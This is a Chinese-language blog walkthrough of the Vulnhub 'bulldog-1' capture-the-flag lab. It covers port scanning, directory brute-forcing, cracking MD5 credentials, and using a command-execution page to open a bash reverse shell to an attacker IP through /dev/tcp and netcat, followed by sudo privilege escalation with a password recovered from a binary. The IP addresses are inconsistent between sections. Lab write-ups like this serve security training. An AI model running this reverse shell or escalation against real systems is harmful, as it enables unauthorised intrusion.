Vulnhub靶场第三关

Vulnhub靶场 bulldog-1
目标:
获得root权限和flflag。
运行环境:
靶机:用VirtualBox启动虚机,导入镜像,网络连接方式设置为桥接到无线网卡。靶机启动后,自动获得IP:
172.20.10.7。
Windows攻击机:物理机,连接无线网卡,自动获取IP:172.20.10.5,安装有Burpsuit、nc、Python2.7、
DirBuster等渗透工具。
Kali攻击机:VMWare启动虚机,桥接到无线网卡,自动获取IP:172.20.10.6。攻击机二选一即可。
渗透攻击:
1.使用nmap扫描ip192.168.1.158
在这里插入图片描述
2.发现端口开启
那么直接访问这个ip
访问成功
在这里插入图片描述
3.没有发现可用信息,进行目录爆破
通过对爆破到的目录进行访问发现了一个登录页面
在这里插入图片描述
4.查看dev 页面
在这里插入图片描述
5.查看页面源码后发现md5加密的代码
在这里插入图片描述
6.进行解码
账号密码:nick--------bulldog
账号密码:sarah-------bulldoglover
7.尝试登录
在这里插入图片描述
登录成功
8.发现可以执行命令
开启nc监听
nc -lvnp 6666
Web-shell输入
echo “bash -i >& /dev/tcp/192.168.1.29/6666 0>&1” | bash
等待监听成功
输入:python -c ‘import pty;pty.spawn("/bin/bash")’
反弹交互式shell成功
在这里插入图片描述
9.
查看系统用户 cat /etc/passwd
查看那些用户值得关注
进入这些用户cd进入
查看当前目录下的所有文件的详细信息,并且查看所有隐藏文件 ls -al
查看可执行文件中的字符串 strings 可执行文件名 查看密码
在这里插入图片描述
执行 Sudo python -c 'import pty;pty.spawn("/bin/bash")'命令
因为sudo只有超级用户才能执行所以会提示输入密码.
输入密码:SUPERultimatePASSWORDyouCANTget
权限提升成功:
在这里插入图片描述
补充:
Sodu -i 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。执行该命令后提示符变为“#”而不是“$”。想退回普通账户时可以执行“exit”或“logout” 。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值